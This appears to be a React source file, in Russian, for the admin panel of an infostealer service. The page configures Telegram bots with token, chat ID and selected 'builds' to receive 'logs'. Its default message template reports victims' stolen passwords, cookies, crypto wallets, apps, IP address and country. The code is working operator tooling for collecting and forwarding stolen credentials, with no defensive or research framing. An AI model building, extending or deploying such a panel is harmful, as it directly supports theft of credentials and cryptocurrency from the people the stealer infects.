import React, { useEffect, useState } from 'react';
import toast from 'react-hot-toast';
import api, { cacheGet, cacheSet, listFrom, maskToken } from '../api';

/* HTML parse_mode on server — use <b>, not Markdown *stars* */
const DEFAULT_TPL = `🔑 <b>Пароли</b>: %passwords%
🍪 <b>Куки</b>: %cookies%
💰 <b>Кошельки</b>: %wallets%
📱 <b>Приложения</b>: %apps%
🌐 <b>IP</b>: %ip%
⛳ <b>Страна</b>: %country%`;

const PLACEHOLDERS = ['%passwords%', '%cookies%', '%wallets%', '%apps%', '%ip%', '%country%'];

function buildsLabel(bot) {
  const b = bot.builds;
  if (Array.isArray(b) && b.length) return b.join(', ');
  if (typeof b === 'string' && b.trim()) return b;
  return 'все';
}

export default function Telegram() {
  const [bots, setBots] = useState(() => cacheGet('tg:bots', []));
  const [builds, setBuilds] = useState(() => cacheGet('builds', []));
  const [open, setOpen] = useState(true);
  const [form, setForm] = useState({
    token: '',
    chat_id: '',
    builds: [],
    template: DEFAULT_TPL,
    label: '',
  });

  async function load() {
    try {
      const [t, b] = await Promise.all([api.get('/telegram'), api.get('/builds')]);
      const botsList = listFrom(t.data, 'bots');
      const buildsList = listFrom(b.data, 'builds');
      setBots(botsList);
      setBuilds(buildsList);
      cacheSet('tg:bots', botsList);
      cacheSet('builds', buildsList);
    } catch (err) {
      toast.error('Ошибка');
      throw err;
    }
  }

  useEffect(() => {
    load().catch(() => {});
  }, []);

  function toggleBuild(name) {
    setForm((f) => ({
      ...f,
      builds: f.builds.includes(name) ? f.builds.filter((x) => x !== name) : [...f.builds, name],
    }));
  }

  function insertPlaceholder(ph) {
    setForm((f) => ({ ...f, template: `${f.template}${f.template.endsWith('\n') ? '' : '\n'}${ph}` }));
  }

  async function save(e) {
    e.preventDefault();
    try {
      await api.post('/telegram', form);
      toast.success('Бот сохранён');
      setForm({ token: '', chat_id: '', builds: [], template: DEFAULT_TPL, label: '' });
      load();
    } catch {
      toast.error('Ошибка сохранения');
    }
  }

  async function remove(id) {
    if (!window.confirm('Удалить бота?')) return;
    try {
      await api.delete(`/telegram/${id}`);
      toast.success('Удалён');
      load();
    } catch {
      toast.error('Ошибка удаления');
    }
  }

  return (
    <div>
      <div className="rm-page-title">Telegram боты</div>
      <div className="rm-help">
        <b>Помощь</b>
        Настройте Telegram-ботов для получения логов. Шаблон поддерживает %passwords% и {'{passwords}'}.
        Доступные плейсхолдеры: %passwords%, %cookies%, %wallets%, %apps%, %ip%, %country%.
      </div>

      <div className="rm-rule-list" style={{ marginBottom: 18 }}>
        {bots.map((b) => (
          <div className="rm-rule" key={b.id}>
            <div className="ico" style={{ background: '#8B5CF6' }}>✈</div>
            <div className="meta">
              <b>{b.label || `Бот #${b.id}`}</b>
              <span>
                Чат: {b.chat_id || '—'} · Токен: {b.token ? maskToken(b.token) : b.token_set ? '••••••••' : 'не задан'} · Билды: {buildsLabel(b)}
              </span>
            </div>
            <button type="button" className="rm-btn danger" onClick={() => remove(b.id)}>Удалить</button>
          </div>
        ))}
        {!bots.length && <div className="rm-card rm-empty">Ботов пока нет</div>}
      </div>

      <div className="rm-card">
        <button type="button" className="rm-btn ghost" style={{ margin: 12 }} onClick={() => setOpen((o) => !o)}>
          {open ? '▾' : '▸'} Новый бот
        </button>
        {open && (
          <form className="rm-form" onSubmit={save}>
            <div className="rm-field">
              <label>Метка</label>
              <input
                value={form.label}
                onChange={(e) => setForm({ ...form, label: e.target.value })}
                placeholder="Основной бот"
              />
            </div>
            <div className="rm-field">
              <label>Токен бота</label>
              <input
                value={form.token}
                onChange={(e) => setForm({ ...form, token: e.target.value })}
                required
                placeholder="123456:ABC..."
                autoComplete="off"
              />
            </div>
            <div className="rm-field">
              <label>Чат для отправки</label>
              <input
                value={form.chat_id}
                onChange={(e) => setForm({ ...form, chat_id: e.target.value })}
                required
                placeholder="-100..."
              />
            </div>
            <div className="rm-field">
              <label>Билды для отправки</label>
              <div className="rm-multi">
                {builds.map((b) => (
                  <label key={b.id}>
                    <input
                      type="checkbox"
                      checked={form.builds.includes(b.name)}
                      onChange={() => toggleBuild(b.name)}
                    />
                    {b.name}
                  </label>
                ))}
                {!builds.length && <span style={{ color: '#94A3B8' }}>Сначала создайте билд</span>}
              </div>
            </div>
            <div className="rm-field">
              <label>Шаблон сообщения</label>
              <div className="rm-tags" style={{ marginBottom: 8 }}>
                {PLACEHOLDERS.map((ph) => (
                  <button key={ph} type="button" className="rm-tag" style={{ cursor: 'pointer' }} onClick={() => insertPlaceholder(ph)}>
                    {ph}
                  </button>
                ))}
              </div>
              <textarea
                value={form.template}
                onChange={(e) => setForm({ ...form, template: e.target.value })}
              />
            </div>
            <button type="submit" className="rm-btn primary" style={{ justifyContent: 'center', padding: 12 }}>
              Сохранить бота
            </button>
          </form>
        )}
      </div>
    </div>
  );
}
